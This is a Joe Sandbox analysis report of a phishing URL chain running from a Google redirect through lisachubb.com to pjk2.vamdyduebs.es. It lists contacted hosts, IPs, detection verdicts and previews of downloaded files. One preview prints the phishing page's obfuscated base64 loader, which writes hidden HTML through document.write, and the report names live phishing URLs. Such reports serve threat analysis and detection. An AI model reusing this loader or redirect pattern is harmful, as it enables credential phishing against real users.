              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5MCKN6FTOwAV4O7fEJmG2kPHijDCZTqaRlwvooLkhwF1SDrBnZkPr0fv7wZ9wqVjJgeF4YrrxgulfO87Or5B7OHf3HhJ8vL-sF4Oxi24848VprKVfug-7_N1GxMm7D-ZsyPVmuMRPSebbbPYc_plJmCgvg22D6Boc4Qe4Yla0_WzjD-qRF2VOtP7PS6i31ttQpyKR8&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/reload?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/clr?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/userverify?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU0%Avira URL Cloudsafe
              https://pjk2.vamdyduebs.es/kT9ifrJ/100%Avira URL Cloudphishing
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92711f95296d0c74&lang=auto0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_X0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92711f95296d0c74/1743101951339/30af089456f68310af88812ffb4625e605cc57cdad4a126551e5cd66f2a8f2db/gsRwXFCPxzgMfCD0%Avira URL Cloudsafe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dX0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              beacons3.gvt2.com
              142.250.80.67
              truefalse
                high
                pjk2.vamdyduebs.es
                172.67.185.250
                truetrue
                  unknown
                  code.jquery.com
                  151.101.2.137
                  truefalse
                    high
                    developers.cloudflare.com
                    104.16.6.189
                    truefalse
                      high
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        high
                        beacons-handoff.gcp.gvt2.com
                        142.251.116.94
                        truefalse
                          high
                          challenges.cloudflare.com
                          104.18.95.41
                          truefalse
                            high
                            www.google.com
                            142.250.81.228
                            truefalse
                              high
                              beacons2.gvt2.com
                              142.250.79.99
                              truefalse
                                high
                                lisachubb.com
                                104.245.240.188
                                truefalse
                                  unknown
                                  beacons.gvt2.com
                                  142.250.81.227
                                  truefalse
                                    high
                                    beacons.gcp.gvt2.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92711f95296d0c74&lang=autofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.com/recaptcha/api2/userverify?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_Xfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                        high
                                        https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8hfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://lisachubb.com/favicon.icofalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                            high
                                            https://developers.cloudflare.com/favicon.pngfalse
                                              high
                                              https://www.google.com/recaptcha/api.jsfalse
                                                high
                                                https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU&co=aHR0cHM6Ly9saXNhY2h1YmIuY29tOjQ0Mw..&hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&size=normal&cb=1vy2jk5iocqmfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHbfalse
                                                  high
                                                  https://www.google.com/recaptcha/api2/reload?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://pjk2.vamdyduebs.es/kT9ifrJ/true
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                    high
                                                    https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5MCKN6FTOwAV4O7fEJmG2kPHijDCZTqaRlwvooLkhwF1SDrBnZkPr0fv7wZ9wqVjJgeF4YrrxgulfO87Or5B7OHf3HhJ8vL-sF4Oxi24848VprKVfug-7_N1GxMm7D-ZsyPVmuMRPSebbbPYc_plJmCgvg22D6Boc4Qe4Yla0_WzjD-qRF2VOtP7PS6i31ttQpyKR8&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92711f95296d0c74/1743101951339/30af089456f68310af88812ffb4625e605cc57cdad4a126551e5cd66f2a8f2db/gsRwXFCPxzgMfCDfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://lisachubb.com/jsuhsks/false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.google.com/recaptcha/api2/clr?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dXfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.65.170
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      1.1.1.1
                                                      unknownAustralia
                                                      13335CLOUDFLARENETUSfalse
                                                      142.250.65.163
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      142.251.40.227
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      142.250.176.206
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      104.18.95.41
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      142.250.81.228
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      172.67.185.250
                                                      pjk2.vamdyduebs.esUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      142.250.80.67
                                                      beacons3.gvt2.comUnited States
                                                      15169GOOGLEUSfalse
                                                      151.101.2.137
                                                      code.jquery.comUnited States
                                                      54113FASTLYUSfalse
                                                      142.251.40.131
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      104.16.6.189
                                                      developers.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.16.4.189
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.17.25.14
                                                      cdnjs.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.245.240.188
                                                      lisachubb.comUnited States
                                                      8100ASN-QUADRANET-GLOBALUSfalse
                                                      142.251.163.84
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      IP
                                                      192.168.2.17
                                                      192.168.2.16
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1650540
                                                      Start date and time:2025-03-27 19:57:52 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Sample URL:https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      Analysis Mode:stream
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal92.phis.evad.win@27/23@54/161
                                                      • Exclude process from analysis (whitelisted): svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.176.206, 142.250.80.67, 142.251.163.84, 142.250.81.238, 142.251.40.227, 142.250.65.170, 142.250.65.202, 142.251.40.138, 142.251.40.170, 142.250.64.74, 142.250.64.106, 142.250.72.106, 142.250.80.10, 142.250.80.42, 142.250.80.74, 142.250.80.106, 142.250.176.202, 142.251.40.202, 142.251.40.234, 142.251.41.10, 172.217.165.138, 142.250.65.163
                                                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&amp;sa=D&amp;sntz=1&amp;usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48122)
                                                      Category:downloaded
                                                      Size (bytes):48123
                                                      Entropy (8bit):5.342998089666478
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EA38BDA3C117E2FE01BD862003357394
                                                      SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                      SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                      SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                      Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):16
                                                      Entropy (8bit):3.75
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AFB69DF47958EB78B4E941270772BD6A
                                                      SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                      SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                      SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCWgZVbeitMz5EgUNU1pHxSEfnXXTHl79Fg==?alt=proto
                                                      Preview:CgkKBw1TWkfFGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65360)
                                                      Category:downloaded
                                                      Size (bytes):911083
                                                      Entropy (8bit):3.3343563750503438
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:36D82F796532D419BA3B930BF5B3E953
                                                      SHA1:0964FB9E1FE27BC634A671E68D385B960456005F
                                                      SHA-256:867F4538ACAC236D8E477ABFBD95D2FCC00590E6DD42AA647EE2771882E5D077
                                                      SHA-512:FF7C22F0533A6E338BC53CC4407BFE193EDECB947B63CD36D7853FD4F3D0E9A424B163CF198CB3E91663A9AC81DDB2C74C0C3AB4E4FE51C467D6A230D0DC3EFA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://pjk2.vamdyduebs.es/kT9ifrJ/
                                                      Preview:<script>.gDOOnBtCXK = atob("aHR0cHM6Ly9rS0ZKLnZhbWR5ZHVlYnMuZXMva1Q5aWZySi8=");.bUldmtlwyx = atob("bm9tYXRjaA==");.zrSLIepGCu = atob("d3JpdGU=");.if(gDOOnBtCXK == bUldmtlwyx){.document[zrSLIepGCu](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IE9pVG1PRlJESlIgPSB7CiAgZ2V0KHNqanRrZG96cnIsIFlGY3JjSU50Y3gpIHsKICAgIGNvbnN0IHp0cEdEdlJVZEIgPSBbLi4uWUZjcmNJTnRjeF0KICAgICAgLm1hcChQWG5pRHBJc3hMID0+ICsoJ+++oCcgPiBQWG5pRHBJc3hMKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3Qgd1p5b05MZHN4RSA9IHp0cEdEdlJVZEIucmVwbGFjZSgvLns4fS9nLCB3RXR5Y1d
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                      Category:downloaded
                                                      Size (bytes):346
                                                      Entropy (8bit):5.307167666984022
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:91C22A154187ED32F7B07D4671C4FCF7
                                                      SHA1:BEE740043A0572B0F2749DB8A0B7156E37DD165B
                                                      SHA-256:21037BC77126F8390BCA8D4675B469F5DA20E2D1FB76F0DAE2AC6A50B7CD4FBE
                                                      SHA-512:7CE9FB54213A701FE5EAE1FCB95FF7A73434FEDD8F41A04C7EAEF9FD9B731AC837BB9E90E1A71CF872134AE247A695899B667740CBACCEF3796C3AC4DDA1F398
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h
                                                      Preview:<HTML><HEAD>.<meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>Redirecting</TITLE>.<META HTTP-EQUIV="refresh" content="1; url=https://lisachubb.com/jsuhsks/">.</HEAD>.<BODY onLoad="location.replace('https://lisachubb.com/jsuhsks/'+document.location.hash)">.Redirecting you to https://lisachubb.com/jsuhsks/</BODY></HTML>..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                      Category:dropped
                                                      Size (bytes):31128
                                                      Entropy (8bit):7.972256665523546
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3F1763C0F51689EFC5BB3FA651EF3B5D
                                                      SHA1:259796984B3E00F9EB79F5D77B67A47CFB5C0D3F
                                                      SHA-256:01A3762D3F99E3F2ECC425277DEB852D989FA51362A0452879FA7BE7EA68FA25
                                                      SHA-512:EBC8DECA704B32F81919A018474335A707691CA0E45A412F4DD9CDDA4AECB00D80A1CAB392FA9BEE481E6D172F566BD2E53F1578BAADFF1EB236AA4CC5793542
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........%..m.T..$......]g...H4..r..K.*.......O.\e..V.{.Y.{X#..p.c.f=I=.*.o..K..gm.eb...bw..MyX...f(y.....>.p.SI-.S........;...../$..m,_[.k...5.DQ....+....Y.>..Q.X.N..B@.r.#....W.{.Ca...2.4l..=3...r.m.e.).".9v`...\..{....e.....Zn.n.n.T..e;.~...k.*cW'..Z..Q.+.....HW..8.....ue8..9nz/..:.o........].~.I.@.[......%...4.V...h..g..yD....s._7~.v.,.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (594)
                                                      Category:downloaded
                                                      Size (bytes):561652
                                                      Entropy (8bit):5.637398859811323
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A3BA6F3831DFAC23271ED79DB3467B14
                                                      SHA1:2F93EAE45276ABDCF26B684EF45036C7BF0D7F61
                                                      SHA-256:9C60F375BB60B19DC9BB69D9F8ABC316D7652A2F088B26C42FCCBDFC15E6FF6A
                                                      SHA-512:5583D01793029A9CC82260B74200812CBDB58CB715F20CCADD5AF76BCD7D561ACBABED018D3107951069AFFF11DC9A3D63A65F6AD17AC263FC0FFB8BECD9CFD1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/releases/hbAq-YhJxOnlU-7cpgBoAJHb/recaptcha__en.js
                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var T=function(){return[function(c,u,t,d,h,F){if(!(c-((c^(h=[7,40,5],h[1]))&3||w.call(this,u),h[2])&h[0]))H[4](88,u,d,t);return F},function(c,u,t,d,h,F,Z,E,y,m,W,a,G){return((((((a=[33,"play",250],(c|5)>>4)||(u_.call(this,t),this.S=u||""),(c|80)==c)&&(m=["1","block","none"],h==(t.F==3)?G=k[38](5):h?(Z=t.F,y=t.f9(),E=H[7](3,u,t),t.mS()?E.add(k[39](54,null,!1,t)):E.add(V[3](74,"",t,y,Z,!1)),k[4](16,!1,m[0],m[1],t),d&&d.resolve(),W=H[6](61),J[16](15,null,J[28](58,t),E,u,El(function(){W.resolve()},t)),.t.p9(3),E[a[1]](),G=W.promise):(H[39](7,"0",m[2],a[2],!0,t,F),t.p9(1),G=k[38](9))),(c|8)&6)==2&&(Z=d.eq,u[t]=function
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):78627
                                                      Entropy (8bit):6.021120116946511
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:ADA37A51F2C5A7FC2D0A7E8E01EE2089
                                                      SHA1:74095BB0EAA20A9B7636FD4E9361FB41115A5CBC
                                                      SHA-256:CC4B8A3C3CBB7F77DBC336386223EB1E26DC401A9D754E8630EE0989846261A4
                                                      SHA-512:B662657A20453A1F8E06557F06309C6C213E487C52E5D02A4DCA6EA5BAB9D39F7E1953DEA4B013F52782BC78C0DC2CD03EAE3526C66B4FA62E833B2D02D9A08D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/releases/hbAq-YhJxOnlU-7cpgBoAJHb/styles__ltr.css
                                                      Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #444746;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 12 x 91, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770306
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4BF8E4B310D5A13AE1FDC82F4846AA21
                                                      SHA1:BB76B86CCE6DC6370F959C8C66CEB15E04A4FC4E
                                                      SHA-256:F7EE60943440B79ED8A6BA154B11C40D58F11945618E2D9D5265F442DC94717E
                                                      SHA-512:D054525C9EDC3870F3983493CDB25B939484A2F509CB1AE3AA031B6EB6C6F95D2E5BDEED75377F54777C117D3CDF94207166C36840BD43BBB400A7087B1AA981
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR.......[............IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):600
                                                      Entropy (8bit):7.391634169810707
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                      SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                      SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                      SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                                      Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):665
                                                      Entropy (8bit):7.42832670119013
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                      SHA1:17BEF6602672E2FD9956381E01356245144003E5
